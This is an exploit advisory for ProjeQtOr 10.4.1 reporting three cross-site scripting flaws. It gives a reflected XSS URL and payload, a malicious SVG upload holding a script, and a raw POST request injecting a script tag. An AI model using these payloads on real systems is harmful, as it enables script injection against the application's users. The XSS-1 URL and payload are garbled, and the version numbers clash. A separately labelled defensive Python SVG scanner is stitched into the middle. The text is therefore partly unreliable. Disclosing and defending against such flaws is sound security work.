Exploit Title: Project Management System v10.4.1 - Multiple XSS
Version: V10.4.1
Bugs: Multiple XSS
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorv10.4.4.1.zip/download
Date of found: 09.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
### XSS-1 ###
Visit: http://localhost/projeqtor/view/ref...pt%3C/script%3C/script%3C/script%3ecsrftoken=
Payload: MIRI%27);%22%3E%3cscript%3ealert(4)%3C/script/script%3E
### XSS-2 ###
Steps:
1. Log in to an account
2. Go to Projects and create a project
3. Add an attachment
3. Upload an SVG file
'''
<?xml version='1.0' standalone='no'?>
!
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
<script type='text/javascript'>
alert(document.location);
</script>
</svg>
'''
4. Go to the SVG file (http://localhost/projeqtor/files/action/actactment/actactment_5/malas.svg)
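The stored XSS in XSS-2 works because the uploaded SVG is served back and rendered in the application's own origin. The following is an added defensive example, not part of the original advisory or of ProjeQtOr's code: an upload-time check that reports active content in an SVG. The function names, the tag policy and the sample files are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Assumed policy: elements that can run script or embed foreign documents.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}

def local(name: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()

def svg_findings(data: bytes) -> list:
    """Reasons to reject an uploaded SVG; an empty list means nothing active was found."""
    if re.search(rb"<!ENTITY", data, re.I):
        return ["entity declaration"]  # refused before parsing (entity expansion)
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = []
    if root.tag != "{%s}svg" % SVG_NS:
        findings.append("root element is not svg")
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append("<%s> element" % tag)
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):  # onload, onclick, ...
                findings.append("%s handler on <%s>" % (name, tag))
            elif name == "href" and re.sub(r"\s+", "", value).lower().startswith("javascript:"):
                findings.append("javascript: href on <%s>" % tag)
    return findings

# Constructed samples: a triangle with an embedded script, and the same shape alone.
ACTIVE = b"""<?xml version='1.0' standalone='no'?>
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
<script type='text/javascript'>alert(document.location);</script>
</svg>"""
CLEAN = b"""<svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
</svg>"""

if __name__ == "__main__":
    print(svg_findings(ACTIVE))  # reports the script element
    print(svg_findings(CLEAN))   # nothing to report
```

A deny-list scan like this is only one layer. Serving uploads with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff`, or from a separate origin, keeps the browser from rendering them inside the application.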
### XSS-3 ###
Go to the address below (POST request)
POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1
Host: localhost
Content-Length: 35
Sec-Ch-Ua:
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Sec-Ch-Ua-Platform: ''
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en; q=0.9
Cookie: phpsessid=r5cjcsggl4j0oa9s70vchaklf3
Connection: close

resultack=<script>alert(4)</script>